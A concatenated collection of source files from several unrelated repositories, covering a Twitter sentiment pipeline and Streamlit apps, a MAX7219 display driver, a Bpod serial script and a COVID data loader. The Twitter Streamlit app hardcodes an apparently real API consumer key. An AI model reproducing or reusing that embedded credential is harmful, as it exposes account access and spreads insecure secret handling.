pred_vars = preds[:, 1::2]
loss = self.criterion(pred_means, pred_vars, targets)
else:
loss = self.criterion(preds, targets) * class_weights * mask
loss = loss.sum() / mask.sum()
return loss
def training_epoch_end(self, outputs):
losses = [d["loss"] for d in outputs]
train_loss = torch.stack(losses, dim=0).mean()
self.log("train_loss", train_loss)
def validation_step(self, batch: Tuple, batch_idx) -> List[float]:
componentss, targets = batch
preds = self.mpnn(componentss)
if self.uncertainty == "mve":
preds = preds[:, 0::2]
targets = torch.tensor(targets, device=self.device)
return self.metric(preds, targets)
def validation_epoch_end(self, outputs):
val_loss = torch.cat(outputs).mean()
self.log("val_loss", val_loss)
def configure_optimizers(self) -> List:
opt = Adam([{"params": self.mpnn.parameters(), "lr": self.init_lr, "weight_decay": 0}])
sched = NoamLR(
optimizer=opt,
warmup_epochs=[self.warmup_epochs],
total_epochs=[self.trainer.max_epochs] * self.num_lrs,
steps_per_epoch=self.num_training_steps,
init_lr=[self.init_lr],
max_lr=[self.max_lr],
final_lr=[self.final_lr],
)
scheduler = {
"scheduler": sched,
"interval": "step" if isinstance(sched, NoamLR) else "batch",
}
return [opt], [scheduler]
@property
def num_training_steps(self) -> int:
"""Total training steps inferred from datamodule and devices."""
if self.trainer.max_steps:
return self.trainer.max_steps
limit_batches = self.trainer.limit_train_batches
batches = len(self.train_dataloader())
if isinstance(limit_batches, int):
batches = min(batches, limit_batches)
else:
batches = int(limit_batches * batches)
num_devices = max(1, self.trainer.num_gpus, self.trainer.num_processes)
if self.trainer.tpu_cores:
num_devices = max(num_devices, self.trainer.tpu_cores)
effective_accum = self.trainer.accumulate_grad_batches * num_devices
return (batches // effective_accum) * self.trainer.max_epochs
```
|
{
"source": "jennafu/howistwitterfeeling",
"score": 3
}
|
#### File: howistwitterfeeling/src/02_feature_engineering_2.py
```python
import re
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Retrieve urls from tweets using URLExtract
# from urlextract import URLExtract
# extractor = URLExtract()
#urls = []
# for i in range(len(train)):
#urls.append(extractor.find_urls(train['text'][i]))
# Read in data after URL extraction
train = pd.read_csv('data/feature_engineered_1_data_partial.csv')
# Remove '][' from the `urls` column
train['urls'] = train['urls'].str[1:-1]
# Split the urls by ','
train['urls'] = train['urls'].str.split(", ")
# Find number of urls in each tweet
url_counts = []
for url in train['urls']:
if url[0] == '':
url_counts.append(0)
else:
url_counts.append(len(url))
train['url_counts'] = url_counts
# Creating a function called clean, that removes all hyperlink, hashtags, mentions and emojis
def clean(x):
x = re.sub(r"^RT[\s]+", "", x)
x = re.sub(r"https?:\/\/.*[\r\n]*", "", x)
x = re.sub('[^ ]+\.[^ ]+','',x)
x = re.sub(r"#","", x)
x = re.sub(r"@[A-Za-z0–9]+","", x)
return x
# Apply the clean function to text column
train['text'] = train['text'].apply(clean)
# Remove the url, user columns from dataset and remove hastag symbols from hashtag column
train.drop(['hashtags'],axis=1,inplace=True)
train.drop(['user'],axis=1,inplace=True)
train.drop(['users'],axis=1,inplace=True)
train.drop(['urls'],axis=1,inplace=True)
train.drop(['tweet_id'],axis=1,inplace=True)
train.to_csv(r'data/feature_engineered_2_data.csv', index = False)
```
#### File: howistwitterfeeling/src/03_preprocessing.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import re
import string
import nltk
from nltk.corpus import stopwords
from nltk.corpus import wordnet
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
nltk.download('stopwords')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
train = pd.read_csv('data/feature_engineered_2.csv')
train['text']=train['text'].astype(str)
# Global Parameters
stop_words = set(stopwords.words('english'))
# Lemmatize with POS Tag
def get_wordnet_pos(word):
"""Map POS tag to first character lemmatize() accepts"""
tag = nltk.pos_tag([word])[0][1][0].upper()
tag_dict = {"J": wordnet.ADJ,
"N": wordnet.NOUN,
"V": wordnet.VERB,
"R": wordnet.ADV}
return tag_dict.get(tag, wordnet.NOUN)
# Create a function preprocess_tweet_text
def preprocess_tweet_text(tweet):
# Convert all characters to lower case
tweet.lower()
# Remove punctuations
tweet = tweet.translate(str.maketrans('', '', string.punctuation))
# Remove stopwords
tweet_tokens = word_tokenize(tweet)
filtered_words = [w for w in tweet_tokens if not w in stop_words]
# Lemmatization
lemmatizer = WordNetLemmatizer()
lemmatized_output = ' '.join([lemmatizer.lemmatize(w,get_wordnet_pos(w)) for w in filtered_words])
return " ".join(filtered_words)
# Apply the preprocess_tweet_text to text column
train['text'] = train['text'].apply(preprocess_tweet_text)
# Save preprocessed dataset
train.to_csv(r'data/preprocess_data.csv', index = False)
```
#### File: src/streamlit/howistwitterfeeling.py
```python
import streamlit as st
import tweepy
# Import the relevant packages
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from datetime import timedelta, date
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
import pickle
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from textblob import TextBlob
import emoji
import regex
import matplotlib.pyplot as pPlot
from wordcloud import WordCloud
from PIL import Image
image = Image.open('src/streamlit/image/morning-brew-V6CdmV277nY-unsplash.jpg')
st.image(image,use_column_width=True)
# st.title('How is Twitter Feeling About...')
st.title('#How is Twitter Feeling About...')
st.text('Welcome to the app! This app serves to provide real-time insights to what Twitter users \n'
'are feeling about a certain topic or issue. Enter the topic you are interested in below:')
option = st.text_input("Which topic would you like to explore?", 'Coronavirus')
# define your keys
consumer_key = '2YCaHB1rnU7I7U8BuDJVqPGP2'
consumer_secret = '<KEY>'
access_token = '<KEY>'
access_token_secret = '<KEY>'
auth = tweepy.OAuthHandler(consumer_key,consumer_secret)
auth.set_access_token(access_token,access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True)
# Derive the date of last 7 days
def daterange(start_date, end_date):
for n in range(int((end_date - start_date).days)):
yield start_date + timedelta(n)
start_date = (date.today() + timedelta(days=-6))
end_date = (date.today() + timedelta(days=1))
date_list = []
for single_date in daterange(start_date, end_date):
date_list.append(single_date)
with st.spinner('Scraping Twitter Data....'):
# Retrive topic-specific tweets
tweets_list_date = list()
tweets_list_text = list()
for date_ in date_list:
text_query = option
coordinates = '43.651070,-79.347015,50mi'
language = 'en'
result_type = 'recent'
since_date = date_
until_date = (date_ + timedelta(days=1))
max_tweets = 1000
# Creation of query method using parameters
tweets = tweepy.Cursor(api.search,q = text_query,geocode = coordinates,lang=language,
result_type = result_type,since = since_date,until = until_date,
count = 100).items(max_tweets)
# List comprehension pulling chosen tweet information from tweets iterable object
# # Add or remove tweet information you want in the below list comprehension
for tweet in tweets:
tweets_list_date.append(tweet.created_at)
tweets_list_text.append(tweet.text)
# List comprehension pulling chosen tweet information from tweets iterable object
# # Add or remove tweet information you want in the below list comprehension
tweets_list = [[tweet.created_at,tweet.text] for tweet in tweets]
# Creation of dataframe from tweets_list
tweets_df = pd.DataFrame({'date' : tweets_list_date,'text' : tweets_list_text},columns=['date','text'])
st.success(f'Scrapped {tweets_df.shape[0]} tweets in the GTA region from Twitter.')
# Add an independent column date
date = tweets_df['date']
date = pd.to_datetime(date).dt.date
# Retrieve the hashtags and add the column to the dataset
hashtags = []
for tweet in tweets_df['text']:
hashtags.append([i for i in tweet.split() if i.startswith("#") ])
tweets_df['hashtags'] = hashtags
# Find number of hashtags in each tweet
hashtag_counts = []
for hashtag in hashtags:
hashtag_counts.append(len(hashtag))
tweets_df['hashtag_counts'] = hashtag_counts
# Remove excessive information from text Column
import re
# Creating a function called clean, that removes all hyperlink, hashtags and mentions
def clean(x):
x = re.sub(r"^RT[\s]+", "", x)
x = re.sub(r"https?:\/\/.*[\r\n]*", "", x)
#x = re.sub('[^ ]+\.[^ ]+','',x)
x = re.sub(r"#","", x)
x = re.sub(r"@[A-Za-z0–9]+","", x)
return x
# Apply the clean function to text column
tweets_df['text'] = tweets_df['text'].apply(clean)
# Load features from training dataset
transformer = TfidfTransformer()
loaded_features = pickle.load(open("src/streamlit/pickle/reduced_new_feature.pkl", "rb"))
# Vectorize the text column
X_text = tweets_df['text'].astype(str)
tfidfconverter = TfidfVectorizer(max_features=10000,
ngram_range=(1,2),
min_df=0.0001, max_df=0.5,
stop_words=stopwords.words('english'),
token_pattern=r'\b[^\d\W]+\b',
strip_accents = "ascii",
vocabulary = loaded_features)
# Convert the features in test set to train set
X_text = transformer.fit_transform(tfidfconverter.fit_transform(X_text))
X_sample = pd.DataFrame(columns=tfidfconverter.get_feature_names(),data=X_text.toarray())
# Load trained model
filename = 'src/streamlit/pickle/svc_new_model.sav'
sgd_model = pickle.load(open(filename, 'rb'))
# Prediction
y_sample = sgd_model.predict(X_sample)
y_prediction = pd.DataFrame(y_sample,columns = ["prediction"])
y_prediction = pd.concat([date,y_prediction],axis=1)
# Get tweet sentiments using TextBlob
textblob_y = list()
for text in tweets_df['text']:
testimonial = TextBlob(text)
textblob_y.append(testimonial.sentiment.polarity)
# Function to find index of neutral tweets
def get_index_positions(list_of_elems, element):
''' Returns the indexes of all occurrences of give element in
the list- listOfElements '''
index_pos_list = []
index_pos = 0
while True:
try:
# Search for item in list from indexPos to the end of list
index_pos = list_of_elems.index(element, index_pos)
# Add the index position in list
index_pos_list.append(index_pos)
index_pos += 1
except ValueError as e:
break
return index_pos_list
# Label tweets with neutral sentiments with the value of 0.5
y_prediction['prediction'][get_index_positions(textblob_y,0.0)] = 0.5
# Find the average sentiments in the last 7 days
y_prediction_table = y_prediction.groupby('date').mean()
# Create figure and plot space
import plotly.graph_objects as go
st.text(' ')
st.text('The chart below returns the average sentiment scores of the last 7 days, \n'
'from a scale of 0 to 1. The scores are calculated by the averaging the prediction \n'
'scores (0 or 1) on a single day.')
fig = go.Figure(data=go.Scatter(x=y_prediction_table.index, y=y_prediction_table.prediction))
fig.update_layout(
title={
'text': "Changes in Twitter Sentiments over Last 7 Days",
'y':0.9,
'x':0.45,
'xanchor': 'center',
'yanchor': 'top'},
yaxis_title="😠 <== Average Sentiment Scores ==> 😄",
xaxis_title="Date")
st.plotly_chart(fig)
def split_count(text):
'''
Return the emojis found in the twitter texts associated with the topic
Input: text column from dataset
Output: A list of emojis found in each rows
'''
emoji_list = []
data = regex.findall(r'\X', text)
for word in data:
if any(char in emoji.UNICODE_EMOJI for char in word):
emoji_list.append(word)
return emoji_list
# Return the emojis found in the twitter texts
emoji_rows = tweets_df['text'].apply(split_count)
# Return a flattened list of emojis from the topic
emoji_list = []
for sublist in emoji_rows:
for item in sublist:
emoji_list.append(item)
emoji_count = [[x,emoji_list.count(x)] for x in set(emoji_list)]
st.text(' ')
st.text('The chart below finds and ranks the top 10 most frequently appearing emojis \n'
'in the tweets we have scrapped from Twitter.')
# Convert the list into a dataframe
emoji_df = pd.DataFrame(emoji_count,columns=['Emoji','Count']).sort_values('Count',ascending=False)
trace1 = {
"type": "bar",
"x": emoji_df['Emoji'][0:11],
"y": emoji_df['Count'][0:11]
}
data = go.Data([trace1])
fig = go.Figure(data=data)
fig.update_layout(
title={
'text': "Top 10 Emojis Associated with Topic",
'y':0.9,
'x':0.5,
'xanchor': 'center',
'yanchor': 'top'},
yaxis_title="Emoji Count",
xaxis_title="Emoji")
st.plotly_chart(fig)
# Merge sentiment and text columns into dataframe
text_sent = pd.concat([y_prediction['prediction'],tweets_df['text']],axis=1)
st.text(' ')
st.text('The word cloud below represents the words or phrases from tweets \n'
'associated with positive and negative senitments accordingly.')
# Create the word cloud
bird = np.array(Image.open('src/streamlit/image/twitter_mask.png'))
fig, (ax2, ax3) = plt.subplots(1, 2, figsize=[30, 15])
wordcloud2 = WordCloud( background_color='white',mask=bird,colormap="Reds",
width=600,stopwords=option,
height=400).generate(" ".join(text_sent[text_sent['prediction']==0]['text']))
ax2.imshow(wordcloud2)
ax2.axis('off')
ax2.set_title('Negative Sentiment',fontsize=35)
wordcloud3 = WordCloud( background_color='white',mask=bird,colormap="Greens",
width=600,stopwords=option,
height=400).generate(" ".join(text_sent[text_sent['prediction']==1]['text']))
ax3.imshow(wordcloud3)
ax3.axis('off')
ax3.set_title('Positive Sentiment',fontsize=35)
plt.show()
st.pyplot()
```
|
{
"source": "jenna-jordan/beepocalypse_streamlit",
"score": 3
}
|
#### File: jenna-jordan/beepocalypse_streamlit/app.py
```python
import streamlit as st
import pandas as pd
import numpy as np
import plotly.express as px
st.set_page_config(page_title="Beepocalpyse", layout="wide")
df = pd.read_csv(
"Data/bln-queries_6pubs_26Feb.csv",
parse_dates=["publication_date"],
dtype={"publisher": "category"},
)
st.title("Beepocalypse: Visualizing Query Results")
publisher_options = [
"New York Times",
"Washington Post",
"Associated Press",
"Agence France Presse",
"Xinhua General News Service",
"Deutsche Presse-Agentur",
]
publisher_map = {
"New York Times": "NYT",
"Washington Post": "WP",
"Associated Press": "AP",
"Agence France Presse": "AFP",
"Xinhua General News Service": "XGNS",
"Deutsche Presse-Agentur": "DPA",
}
query_options = list(df["query"].unique())
query_text = {
"total": """
```
(content:*) AND source_name:BulkLexisNexis
```
""",
"insect_population": """
```
(content:
(insect OR pollinator OR bee OR honeybee OR moth)
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
)
AND (source_name:BulkLexisNexis)
```
""",
"insect_decline": """
```
(content:
(insect OR pollinator OR bee OR honeybee OR moth)
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
AND (crisis OR "colony collapse" OR apocalypse OR armageddon OR extinct OR "insect decline"~5 OR "insect drop"~5 OR "insect decrease"~5 OR "insect disappear"~5 OR "population decline"~5 OR "population drop"~5 OR "population decrease"~5 OR "population disappear"~5 OR "abundance decline"~5 OR "abundance drop"~5 OR "abundance decrease"~5 OR "abundance disappear"~5)
)
AND (source_name:BulkLexisNexis)
```
""",
"pollinator_population": """
```
(content:
((insect AND pollinator) OR (bee OR honeybee OR moth))
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
)
AND (source_name:BulkLexisNexis)
```
""",
"pollinator_decline": """
```
(content:
((insect AND pollinator) OR (bee OR honeybee OR moth))
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
AND (crisis OR "colony collapse" OR apocalypse OR armageddon OR extinct OR "insect decline"~5 OR "insect drop"~5 OR "insect decrease"~5 OR "insect disappear"~5 OR "population decline"~5 OR "population drop"~5 OR "population decrease"~5 OR "population disappear"~5 OR "abundance decline"~5 OR "abundance drop"~5 OR "abundance decrease"~5 OR "abundance disappear"~5)
)
AND (source_name:BulkLexisNexis)
```
""",
"insect_apocalypse": """
```
(content:"insect apocalypse"~5 OR "insect armageddon"~5 OR "beepocalypse")
AND (source_name:BulkLexisNexis)
```
""",
"colony_collapse": """
```
(content:"colony collapse" AND (bee OR honeybee))
AND (source_name:BulkLexisNexis)
```
""",
"climate_change": """
```
(content:"climate change" OR "global warming")
AND (source_name:BulkLexisNexis)
```
""",
"climate_change_IPCCreport": """
```
(content:
("climate change" OR "global warming")
AND ("IPCC" OR "Intergovernmental Panel on Climate Change")
AND report
)
AND (source_name:BulkLexisNexis)
```
""",
"insect_population_studies": """
```
(content:
("Krefeld" OR "the German study" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "the Puerto Rico study" OR "S?nchez-Bayo" OR "Wyckhuys" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>" OR "<NAME>")
AND (insect OR pollinator OR bee OR honeybee OR moth)
AND ("insect population"~5 OR "pollinator population"~5 OR "bee population"~5 OR "honeybee population"~5 OR "moth population"~5 OR "biological diversity" OR biodiversity OR biomass OR ecolog* OR ecosystem* OR entomolog*)
AND (study OR professor OR experiment OR research OR analysis OR data)
)
AND (source_name:BulkLexisNexis)
```
""",
}
with st.sidebar:
st.header("Configure the plot")
# plot_button = st.button("Add Plot")
# clear_button = st.button("Clear Plots")
choose_CountOrProp = st.radio(
"Article", ["count", "proportion"], key="count_or_prop"
)
# if "count_or_prop" not in st.session_state:
# st.session_state.count_or_prop = "count"
choose_comparison = st.radio(
"Compare", ["Queries", "Publishers"], key="queries_or_publishers"
)
# if "queries_or_publishers" not in st.session_state:
# st.session_state.queries_or_publishers = "Queries"
if choose_comparison == "Queries":
choose_publisher = st.selectbox(
"Choose a publisher", publisher_options, key="publisher"
)
# if "publisher" not in st.session_state:
# st.session_state.publisher = "New York Times"
elif choose_comparison == "Publishers":
choose_query = st.selectbox("Choose a query", query_options, key="query")
# if "query" not in st.session_state:
# st.session_state.query = "insect_population"
st.header("Learn more")
st.markdown(
"Read the journal article: [No buzz for bees: Media coverage of pollinator decline](https://www.pnas.org/content/118/2/e2002552117)"
)
see_queries = st.checkbox("Show Queries?")
if see_queries:
see_which_queries = st.multiselect(
"Show query text for", query_options, default=query_options
)
@st.cache
def create_plot(which_query=choose_comparison, y_axis=choose_CountOrProp):
if which_query == "Queries":
color = "query"
query_value = publisher_map[choose_publisher]
query_column = "publisher"
elif which_query == "Publishers":
color = "publisher"
query_value = choose_query
query_column = "query"
query_text = f"{query_column}=='{query_value}'"
title_text = f"{query_column}: {query_value}"
fig = px.line(
df.query(query_text),
x="publication_date",
y=y_axis,
color=color,
title=title_text,
)
if which_query == "Queries":
for trace in fig["data"]:
if trace["name"] == "total":
trace["visible"] = "legendonly"
fig.update_layout(xaxis_rangeslider_visible=True)
return fig
plot = create_plot()
st.plotly_chart(plot, use_container_width=True)
if see_queries:
for q in see_which_queries:
st.subheader(q)
st.markdown(query_text[q])
```
|
{
"source": "jennan/crash_prediction",
"score": 3
}
|
#### File: src/crash_prediction/visualize.py
```python
from pathlib import Path
import defopt
import pandas as pd
import hvplot
import hvplot.pandas # noqa
import panel as pn
def plot_map(dset, varname, title, cmap="fire", **kwargs):
return dset.hvplot.points(
"X",
"Y",
c=varname,
title=title,
rasterize=True,
aggregator="mean",
cmap=cmap,
geo=True,
tiles="CartoLight",
frame_width=450,
frame_height=450,
groupby="fold",
**kwargs
)
def display_results(dset_file: Path, *preds_file: Path, show: bool = True):
"""Display accidents according to their severity and compare with predictions
:param dset_file: CAS dataset .csv file
:param preds_file: predictions .csv file for one method
:param show: open the server in a new browser tab on start
"""
dset = pd.read_csv(dset_file, usecols=["X", "Y", "injuryCrash", "fold"])
dset["injuryCrash"] = dset["injuryCrash"].astype(float)
if preds_file:
filename_widget = pn.widgets.Select(
name="Predictions file",
options=list(preds_file),
margin=(20, 20, 0, 20),
width=400,
)
@pn.depends(filename=filename_widget.param.value)
def plot_crash_n_results(filename):
dset["predictions"] = pd.read_csv(filename)
dset["error"] = dset["injuryCrash"] - dset["predictions"]
crash_map = plot_map(dset, "injuryCrash", "Ground truth", clim=(0, 1))
preds_map = plot_map(dset, "predictions", "Predictions", clim=(0, 1))
error_map = plot_map(dset, "error", "Errors", cmap="seismic", clim=(-1, 1))
hv_maps = pn.panel(crash_map + preds_map + error_map)
return pn.Column(hv_maps[1][0][0], hv_maps[0])
pane = pn.Column(filename_widget, plot_crash_n_results)
else:
pane = pn.panel(plot_map(dset, "injuryCrash", "Ground truth"))
pn.serve(pane, show=show)
def main():
defopt.run(display_results)
```
|
{
"source": "jennan/iblrig",
"score": 3
}
|
#### File: iblrig/scripts/bpod_lights.py
```python
import logging
import struct
import sys
import serial
import iblrig.params as params
log = logging.getLogger('iblrig')
def main(comport: str, command: int):
if not comport:
comport = params.get_board_comport()
ser = serial.Serial(port=comport, baudrate=115200, timeout=1)
ser.write(struct.pack('cB', b':', command))
ser.close()
log.debug(f"Sent <:{command}> to {comport}")
return
if __name__ == "__main__":
if len(sys.argv) == 2:
comport = params.get_board_comport()
command = sys.argv[1]
else:
comport = sys.argv[1]
command = sys.argv[2]
main(comport, int(command))
```
|
{
"source": "jennapederson/retail-demo-store",
"score": 3
}
|
#### File: src/products/convert_catalog_data.py
```python
import argparse
import csv
import oyaml as yaml
def format_product(product):
product['abv'] = float(product['abv'])
product['price'] = float(product['price'])
if product['ibu'] == 'N/A':
product.pop('ibu')
else:
product['ibu'] = int(product['ibu'])
product['image'] = product['id'] + ".jpg"
style_prefix = "-".join(product['style'].replace('-',' ').split()).lower()
product['id'] = f"{style_prefix}-{product['id']}"
return product
def create_category(id, product):
return {
'id': id,
'name': product['category'],
'image': product['image']
}
if __name__=="__main__":
parser = argparse.ArgumentParser(description='Convert catalog data from CSV file.')
parser.add_argument('file', metavar='CATALOG_CSV_FILE', type=open, help='CSV file with catalog data')
args = parser.parse_args()
products_yaml = open('src/products-service/data/products.yaml', 'w')
categories_yaml = open('src/products-service/data/categories.yaml', 'w')
reader = csv.DictReader(args.file)
products = list(reader)
categories = []
category_names = set()
for product in products:
product = format_product(product)
if product['category'] not in category_names:
category_names.add(product['category'])
categories.append(create_category(len(category_names), product))
yaml.dump(products, products_yaml, allow_unicode=True, sort_keys=False, default_flow_style=False)
yaml.dump(categories, categories_yaml, allow_unicode=True, sort_keys=False, default_flow_style=False)
```
|
{
"source": "JennaSys/micropython-max7219",
"score": 3
}
|
#### File: JennaSys/micropython-max7219/max7219.py
```python
from machine import Pin, SPI
import time
from seven_segment_ascii import get_char2
MAX7219_DIGITS = 8
MAX7219_REG_NOOP = 0x0
MAX7219_REG_DIGIT0 = 0x1
MAX7219_REG_DIGIT1 = 0x2
MAX7219_REG_DIGIT2 = 0x3
MAX7219_REG_DIGIT3 = 0x4
MAX7219_REG_DIGIT4 = 0x5
MAX7219_REG_DIGIT5 = 0x6
MAX7219_REG_DIGIT6 = 0x7
MAX7219_REG_DIGIT7 = 0x8
MAX7219_REG_DECODEMODE = 0x9
MAX7219_REG_INTENSITY = 0xA
MAX7219_REG_SCANLIMIT = 0xB
MAX7219_REG_SHUTDOWN = 0xC
MAX7219_REG_DISPLAYTEST = 0xF
SPI_BUS = 1 # hardware SPI
SPI_BAUDRATE = 100000
SPI_CS = 0 # D3
class SevenSegment:
def __init__(self, digits=8, scan_digits=MAX7219_DIGITS, baudrate=SPI_BAUDRATE, cs=SPI_CS):
"""
Constructor:
`digits` should be the total number of individual digits being displayed
`cs` is the GPIO port to use for the chip select line of the SPI bus - defaults to GPIO 0 / D3
`scan_digits` is the number of digits each individual max7219 displays
`baudrate` defaults to 100KHz, note that excessive rates may result in instability (and is probably unnecessary)
"""
self.digits = digits
self.devices = -(-digits // scan_digits) # ceiling integer division
self.scan_digits = scan_digits
self._buffer = [0] * digits
self._spi = SPI(SPI_BUS, baudrate=baudrate, polarity=0, phase=0)
self._cs = Pin(cs, Pin.OUT, value=1)
self.command(MAX7219_REG_SCANLIMIT, scan_digits-1) # digits to display on each device 0-7
self.command(MAX7219_REG_DECODEMODE, 0) # use segments (not digits)
self.command(MAX7219_REG_DISPLAYTEST, 0) # no display test
self.command(MAX7219_REG_SHUTDOWN, 1) # not blanking mode
self.brightness(7) # intensity: range: 0..15
self.clear()
def command(self, register, data):
"""Sets a specific register some data, replicated for all cascaded devices."""
self._write([register, data] * self.devices)
def _write(self, data):
"""Send the bytes (which should comprise of alternating command, data values) over the SPI device."""
self._cs.off()
self._spi.write(bytes(data))
self._cs.on()
def clear(self, flush=True):
"""Clears the buffer and if specified, flushes the display."""
self._buffer = [0] * self.digits
if flush:
self.flush()
def flush(self):
"""For each digit, cascade out the contents of the buffer cells to the SPI device."""
for dev in range(self.devices):
for pos in range(self.scan_digits):
self._write([pos + MAX7219_REG_DIGIT0, self._buffer[pos + (dev * self.scan_digits)]] + ([MAX7219_REG_NOOP, 0] * dev))
def brightness(self, intensity):
"""Sets the brightness level of all cascaded devices to the same intensity level, ranging from 0..15."""
self.command(MAX7219_REG_INTENSITY, intensity)
def letter(self, position, char, dot=False, flush=True):
"""Looks up the appropriate character representation for char and updates the buffer, flushes by default."""
value = get_char2(char) | (dot << 7)
self._buffer[position] = value
if flush:
self.flush()
def text(self, text):
"""Outputs the text (as near as possible) on the specific device."""
self.clear(False)
text = text[:self.digits] # make sure we don't overrun the buffer
for pos, char in enumerate(text):
self.letter(pos, char, flush=False)
self.flush()
def number(self, val):
"""Formats the value according to the parameters supplied, and displays it."""
self.clear(False)
strval = ''
if isinstance(val, (int, float)):
strval = str(val)
elif isinstance(val, str):
if val.replace('.', '', 1).strip().isdigit():
strval = val
if '.' in strval:
strval = strval[:self.digits+1]
else:
strval = strval[:self.digits]
pos = 0
for char in strval:
dot = False
if char == '.':
continue
else:
if pos < len(strval) - 1:
if strval[pos + 1] == '.':
dot = True
self.letter(pos, char, dot, False)
pos += 1
self.flush()
def scroll(self, rotate=True, reverse=False, flush=True):
"""Shifts buffer contents left or right (reverse), with option to wrap around (rotate)."""
if reverse:
tmp = self._buffer.pop()
if rotate:
self._buffer.insert(0, tmp)
else:
self._buffer.insert(0, 0x00)
else:
tmp = self._buffer.pop(0)
if rotate:
self._buffer.append(tmp)
else:
self._buffer.append(0x00)
if flush:
self.flush()
def message(self, text, delay=0.4):
"""Transitions the text message across the devices from left-to-right."""
self.clear(False)
for char in text:
time.sleep(delay)
self.scroll(rotate=False, flush=False)
self.letter(self.digits-1, char)
```
|
{
"source": "JennaSys/pcra",
"score": 2
}
|
#### File: JennaSys/pcra/setup.py
```python
from setuptools import setup, find_packages
import pathlib
import sys
# The directory containing this file
project_folder = pathlib.Path(__file__).parent
sys.path.append(str(project_folder))
from pcra import __version__
def glob_fix(package_name, glob):
# this assumes setup.py lives in the folder that contains the package
package_path = pathlib.Path(f'./{package_name}').resolve()
return [str(path.relative_to(package_path))
for path in package_path.glob(glob)]
# The text of the README file
README = (project_folder / "README.md").read_text()
setup(
name="pcra",
version=__version__,
description="Python Create React App",
long_description=README,
long_description_content_type="text/markdown",
url="https://github.com/JennaSys/pcra",
author="<NAME>",
author_email="<EMAIL>",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Framework :: Flask",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Programming Language :: Python :: 3.7",
"Operating System :: OS Independent",
"Environment :: Console",
"Natural Language :: English"
],
python_requires=">=3.7,<3.8",
keywords="react material-ui mui transcrypt cli web",
packages=find_packages(include=["pcra"]),
package_data={'pcra': [*glob_fix('pcra', 'template/**/*')]},
install_requires=["patch", "colorama"],
entry_points={
"console_scripts": [
"py-create-react-app=pcra.__main__:main",
]
},
)
```
|
{
"source": "JennaSys/rtp_demo",
"score": 3
}
|
#### File: JennaSys/rtp_demo/pyreact.py
```python
def require(lib):
return lib
class document:
getElementById = None
addEventListener = None
# __pragma__ ('noskip')
# Load React and ReactDOM JavaScript libraries into local namespace
React = require('react')
ReactDOM = require('react-dom')
# Map React javaScript objects to Python identifiers
createElement = React.createElement
useState = React.useState
def render(root_component, props, container):
"""Loads main react component into DOM"""
def main():
ReactDOM.render(
React.createElement(root_component, props),
document.getElementById(container)
)
document.addEventListener('DOMContentLoaded', main)
```
|
{
"source": "JennaVergeynst/COVID19-Model",
"score": 4
}
|
#### File: covid19model/data/sciensano.py
```python
import os
import datetime
import pandas as pd
import numpy as np
def get_sciensano_COVID19_data(update=True):
"""Download Sciensano hospitalisation cases data
This function returns the publically available Sciensano data
on COVID-19 related hospitalisations.A copy of the downloaded dataset
is automatically saved in the /data/raw folder.
Parameters
----------
update : boolean (default True)
True if you want to update the data,
False if you want to read only previously saved data
Returns
-----------
df : pandas.DataFrame
DataFrame with the sciensano data on daily basis. The following columns
are returned:
- pd.DatetimeIndex : datetimes for which a data point is available
- H_tot : total number of hospitalised patients (according to Sciensano)
- ICU_tot : total number of hospitalised patients in ICU
- H_in : total number of patients going to hospital on given date
- H_out : total number of patients discharged from hospital on given data
- H_tot_cumsum : calculated total number of patients in hospital,
calculated as by taking the cumulative sum of H_net = H_in - H_out
- D_tot : total number of deaths
- D_xx_yy: total number of deaths in the age group xx to yy years old
Notes
----------
The data is extracted from Sciensano database: https://epistat.wiv-isp.be/covid/
Variables in raw dataset are documented here: https://epistat.sciensano.be/COVID19BE_codebook.pdf
Example use
-----------
>>> # download data from sciensano website and store new version
>>> sciensano_data = get_sciensano_COVID19_data(update=True)
>>> # load data from raw data directory (no new download)
>>> sciensano_data = get_sciensano_COVID19_data()
"""
# Data source
url = 'https://epistat.sciensano.be/Data/COVID19BE.xlsx'
abs_dir = os.path.dirname(__file__)
if update==True:
# Extract hospitalisation data from source
df = pd.read_excel(url, sheet_name="HOSP")
# save a copy in the raw folder
rel_dir = os.path.join(abs_dir, '../../../data/raw/sciensano/COVID19BE_HOSP.csv')
df.to_csv(rel_dir, index=False)
# Extract total reported deaths per day
df_mort = pd.read_excel(url, sheet_name='MORT', parse_dates=['DATE'])
# save a copy in the raw folder
rel_dir_M = os.path.join(abs_dir, '../../../data/raw/sciensano/COVID19BE_MORT.csv')
df_mort.to_csv(rel_dir_M, index=False)
else:
df = pd.read_csv(os.path.join(abs_dir,
